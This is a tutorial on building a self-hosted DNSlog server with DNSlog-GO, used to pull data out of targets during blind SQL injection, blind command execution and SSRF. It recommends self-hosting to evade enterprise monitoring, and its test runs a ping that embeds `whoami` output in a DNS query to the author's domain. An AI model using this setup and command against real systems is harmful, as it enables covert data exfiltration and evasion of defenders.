Self-built DNSlog server

Introduction to DNSlog

In some cases, the echo cannot be obtained by exploiting the vulnerability. However, if the target can send DNS requests, the desired data can be taken out through the DNS log.

DNS logs are often used in the following situations:

• SQL blind injection
• Command execution without echo
• SSRF without echo

There are many dnslog services publicly available on the Internet, such as dnslog.cn, Zhichuangyu, Clover, etc., but the domain names provided by these services are fixed. Now some relatively large enterprises have added these domain names to the monitoring scope.

If you build a dnslog service yourself, you can avoid this situation very well.

need to prepare

1. An Alibaba Cloud domain name
2. One VPS server

DNS

Add an A record and an NS record in bigwulong.cn. The A record points to the server IP address, and the NS record points to the domain name address of the A record

method of obtaining

DNSlog-GO uses the dnslog server written in golang, with its own WEB interface, and the web can be customized, edited, modified and beautified. Compatible with Linux, MACOS, Windows and other systems. Each platform can be directly downloaded and run without installation dependencies. Here, Linux is used as an example.

Github address: https://github.com/lanyi1998/DNSlog-GO/releases/

Download address of this site (Linux DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-linux.zip

Download address of this site (MacOS DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-macos.zip

Download address of this site (Windows DNSlog-GO version 1.5.6): https://resource.if010.com/DNSlog-GO/dnslog-windows.zip

run

Modify the default token

[root@localhost ~]# vim config.yaml 

HTTP:
  port: 8000
  #{"token":"用户对应子域名"}
  user: {
    
     "123456": "logdns" }
  consoleDisable: false
Dns:
  domain: bigwulong.cn

start up

[root@localhost ~]# ./dnslog-linux &
2023/07/14 07:09:39 Http Listing Start...
2023/07/14 07:09:39 Http address: http://0.0.0.0:8000
2023/07/14 07:09:39 DNS Listing Start...

View process and monitoring

[root@kr-seoul ~]# ps aux | grep dnslog
root      3275  0.0  0.6 714196  6160 pts/0    Sl   07:09   0:00 ./dnslog-linux
root      3296  0.0  0.0 112808   976 pts/0    R+   07:11   0:00 grep --color=auto dnslog

[root@kr-seoul ~]# netstat -tnlpu | grep -E '8000|53'
tcp6       0      0 :::8000                 :::*                    LISTEN      3275/./dnslog-linux 
udp6       0      0 :::53                   :::*                                3275/./dnslog-linux 

test

Web page access test, [font color="red"] needs to enter token, the token here is the value set in config.yaml[/font]

Click to copy the random subdomain name to spmkj.dnslog.bigwulong.cn

Use the ping command

[root@localhost ~]# ping `whoami`.spmkj.dnslog.bigwulong.cn -c 1
PING root.spmkj.dnslog.bigwulong.cn (127.0.0.1) 56(84) bytes of data.
64 bytes from kr-seoul.if010.com (127.0.0.1): icmp_seq=1 ttl=64 time=0.023 ms

root.spmkj.dnslog.bigwulong.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.023/0.023/0.023/0.000 ms

You can see the echo result